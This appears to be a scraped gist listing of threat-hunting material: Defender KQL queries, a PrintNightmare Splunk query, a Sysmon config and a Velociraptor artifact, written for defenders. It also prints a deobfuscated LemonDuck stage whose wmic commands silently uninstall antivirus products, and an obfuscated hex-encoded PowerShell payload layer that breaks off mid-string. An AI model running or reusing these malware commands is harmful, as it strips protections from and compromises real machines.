View cmdl32_writeToExec.kql
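// Straightforward and easy
// Files written by a process whose image name contains "cmdl32", keyed by the
// written file's name, path, device and SHA1 so it can be matched to a later
// process start of that same file.
let CmdlWrites = DeviceFileEvents
    | where InitiatingProcessFileName has "cmdl32"
    | project WrittenFile = FileName, WrittenPath = FolderPath, DeviceId, SHA1;
// kind=inner: the default join flavour (innerunique) keeps only one left row per
// key, which would silently drop repeated executions of the same written file.
DeviceProcessEvents
| join kind=inner CmdlWrites on $left.FileName == $right.WrittenFile, $left.FolderPath == $right.WrittenPath, DeviceId, SHA1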
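// You can swap out DeviceProcessEvents for image loads just as easy.
// Same write-then-use pattern, but the "use" is an image load (e.g. a DLL)
// rather than a process start.
let CmdlWrites = DeviceFileEvents
    | where InitiatingProcessFileName has "cmdl32"
    | project WrittenFile = FileName, WrittenPath = FolderPath, DeviceId, SHA1;
// kind=inner: the default join flavour (innerunique) keeps only one left row per
// key, which would silently drop repeated loads of the same written file.
DeviceImageLoadEvents
| join kind=inner CmdlWrites on $left.FileName == $right.WrittenFile, $left.FolderPath == $right.WrittenPath, DeviceId, SHA1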
thehack3r4chan / FileCreationThenLoad.kql
Last active Sep 22, 2021
actCtxKatz Detection - Defender for Endpoint
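// This is merely a hunting query, filter to your own environment.
// https://app.any.run/tasks/0efed476-5eca-4ee3-8ac9-32307c13ea08DeviceFileEvents
// Finds an image load that happens shortly after the same process created that
// file on disk, where the loaded file is unsigned or not trusted.
// Longest allowed gap (ms) between the file write and the image load; 50000 = 50 s.
let maxWriteToLoadMs = 50000;
// Unsigned / untrusted certificate info, excluding Google-signed binaries.
let SuspectCerts = DeviceFileCertificateInfo
    | where IsSigned == false or IsTrusted == false
    | where not (Signer has "Google LLC")
    | project Signer, SHA1, IsTrusted, IsSigned;
// File creations, keyed by the writing process. InitiatingProcessCreationTime is
// part of the key so a reused ProcessId cannot pair an unrelated write with a load.
let FileWrites = DeviceFileEvents
    | where ActionType == "FileCreated"
    | where isnotempty(SHA1)
    | project-rename FileWrittenTimestamp = Timestamp
    | project FileWrittenTimestamp, SHA1, FolderPath, DeviceId, InitiatingProcessId, InitiatingProcessCreationTime, InitiatingProcessFileName;
DeviceImageLoadEvents
| where isnotempty(SHA1)
// kind=inner so every load of a given hash is kept (the default innerunique keeps
// only one left row per key).
| join kind=inner SuspectCerts on SHA1
| join kind=inner FileWrites on SHA1, FolderPath, DeviceId, InitiatingProcessId, InitiatingProcessCreationTime, InitiatingProcessFileName
// FolderPath1 is the right-side (file write) path; same value as the load path by construction.
| project-rename FileWrittenAndLoaded = FolderPath1
| extend TimeDiff = datetime_diff("millisecond", Timestamp, FileWrittenTimestamp)
// Positive only: the write must precede the load.
| where TimeDiff > 0 and TimeDiff < maxWriteToLoadMs
| project Timestamp, DeviceId, ReportId, InitiatingProcessId, InitiatingProcessFolderPath, FileWrittenAndLoaded, SHA1, TimeDiff, Signer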
View PrinterNightMare_CrowdStrike.spl
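``` Based on https://www.reddit.com/r/crowdstrike/comments/oblzcl/20210701_cool_query_friday_printnightmare_poc/ ```
``` Query for Registry Mods: spoolsv.exe processes that wrote a printer-driver "Data File" or "Configuration File" value, restricted to servers and domain controllers. SPL comments use triple backticks; "//" is not comment syntax and would be searched as literal terms. ```
event_simpleName=ProcessRollup2
| rename FileName as PE, ImageFileName as PE_Path, TargetProcessId_decimal as ContextProcessId_decimal
| where PE=="spoolsv.exe"
``` Inner join on the process that performed the registry write; the subsearch is subject to Splunk's subsearch row and time limits, so narrow the time range in large environments. ```
| join ContextProcessId_decimal, aid
[search event_simpleName=AsepValueUpdate (RegObjectName="\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\*\\Data File" OR RegObjectName="\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\*\\Configuration File")]
``` ProductType is added to OUTPUT because the eval below reads it and it was not previously pulled from aid_master, which left the final where with nothing to match; confirm the field name against your aid_master lookup. ```
| lookup local=true aid_master aid OUTPUT Version MachineDomain OU SiteName ProductType
| eval ProductType=case(ProductType = "1","Workstation", ProductType = "2","Domain Controller", ProductType = "3","Server")
| where ProductType=="Server" OR ProductType=="Domain Controller"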
thehack3r4chan / LemonDuck.ps1
Created May 21, 2021
Deobfuscated LemonDuck payload after ProxyLogon exploitation.
# Deobfuscated LemonDuck stage, kept byte-for-byte as a reference artifact.
# Each line spawns a detached cmd.exe (start /b) that asks WMI
# (wmic.exe product where "name like ..." call uninstall /nointeractive)
# to silently remove any installed product whose name matches the pattern.
# Defender note: a cmd.exe -> wmic.exe chain with "product", "call uninstall" and
# /nointeractive, where the pattern names security vendors, is a high-signal
# detection; the "%%Kaspersky%%" double-percent is preserved from the sample.
cmd.exe /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd.exe /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd.exe /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd.exe /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd.exe /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
thehack3r4chan / Sysmonconfig.xml
Last active Mar 26, 2021
Mamba Sysmon Config
<Sysmon schemaversion="4.50">
<!-- Hashing algorithms that can be used are md5,sha1,sha256,imphash or * for all;
more than one can be specified, separated by commas -->
<HashAlgorithms>sha256</HashAlgorithms>
<ArchiveDirectory>Sysmon</ArchiveDirectory>
<!-- Checking for signature revocation for drivers. -->
<CheckRevocation/>
<EventFiltering>
<FileCreate onmatch="include">
<TargetFilename name="" condition="contains">C:\Users\Public\</TargetFilename> <!--Looks for the file creations of all the DiskCryptor files and ransom note-->
thehack3r4chan / VQL
Created Feb 27, 2021
Velociraptor - ADSViewer
name: Custom.Windows.ADSViewer
description: |
Prints the contents of an Alternate Data Stream (ADS). Both parameters must
be filled in for the data to be pulled. Looking at the ntfs table in VFS
will let you find both the target and the stream.
precondition: SELECT OS From info() where OS = 'windows'
parameters:
View Layer1.ps1
# ASCII-encoded hex string delimited by '#'
$siIGk = '33#46#03#16#C7#72#72#02#E6#96#F6#A6#D2#02#37#27#16#86#34#96#96#36#37#16#42#02#D3#76#E6#96#27#47#35#96#96#36#37#16#42#B3#D7#22#F5#42#87#03#22#D5#56#47#97#26#B5#D5#27#16#86#36#B5#B7#02#47#36#56#A6#26#F4#D2#86#36#16#54#27#F6#64#C7#02#92#72#E5#72#82#47#96#C6#07#37#E2#67#D6#42#02#D3#37#27#16#86#34#96#96#36#37#16#42#B3#92#72#76#07#A6#E2#73#F6#E6#96#44#F2#47#C6#E2#16#27#56#86#F2#F2#A3#07#47#47#86#72#C2#46#F6#86#47#56#D4#A3#A3#D5#56#07#97#45#C6#C6#16#34#E2#36#96#37#16#24#C6#16#57#37#96#65#E2#47#66#F6#37#F6#27#36#96#D4#B5#C2#72#76#E6#96#27#47#72#02#B2#02#72#35#46#16#72#02#B2#02#72#F6#C6#E6#72#02#B2#02#72#77#F6#44#72#C2#97#47#47#42#82#56#D6#16#E6#97#24#C6#C6#16#34#A3#A3#D5#E6#F6#96#47#36#16#27#56#47#E6#94#E2#36#96#37#16#24#C6#16#57#37#96#65#E2#47#66#F6#37#F6#27#36#96#D4#B5#02#D3#67#D6#42#B3#92#72#36#96#37#16#24#C6#16#57#37#96#65#E2#47#66#F6#37#F6#27#36#96#D4#72#82#56#D6#16#E4#C6#16#96#47#27#16#05#86#47#96#75#46#16#F6#C4#A3#A3#D5#97#C6#26#D6#56#37#37#14#E2#E6#F6#96#4